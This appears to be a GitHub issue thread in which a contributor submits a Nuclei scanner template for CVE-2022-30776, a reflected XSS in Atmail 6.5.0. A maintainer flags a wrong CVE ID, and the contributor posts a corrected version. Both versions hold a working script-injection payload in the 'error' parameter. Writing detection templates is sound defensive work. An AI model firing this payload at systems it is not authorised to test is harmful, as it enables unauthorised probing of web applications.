CVE-2022–30776

Question

CVE-2022–30776

3th1cyuk1 opened this issue 2 years ago · comments

Template Information:

Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “error” parameter.

Nuclei Template:

id: CVE-2022-30777

info:
  name: Atmail Xss
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59

requests:
  - method: GET
    path:
     - "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('XSS')</script>"

      - type: word
        part: header
        words:
          - "text/html"

Prince Chaddha · Answer 1 · Tue May 17 2022 19:48:04 GMT+0800 (China Standard Time)

Hello @3th1cyuk1, Thank you for creating this issue, but the CVE name and reference are for Parallels H-Sphere XSS

Yukesh kumar · Answer 2 · Tue May 17 2022 19:55:18 GMT+0800 (China Standard Time)

Hello @princechaddha

So sorry for this inconvenience caused,

id: CVE-2022-30776

info:
  name: Atmail Xss
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9

requests:
  - method: GET
    path:
     - "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('XSS')</script>"

      - type: word
        part: header
        words:
          - "text/html"

Prince Chaddha · Answer 3 · Tue May 24 2022 16:16:16 GMT+0800 (China Standard Time)

Hello @3th1cyuk1, thank you so much for sharing this template with the community and contributing to this project 🍻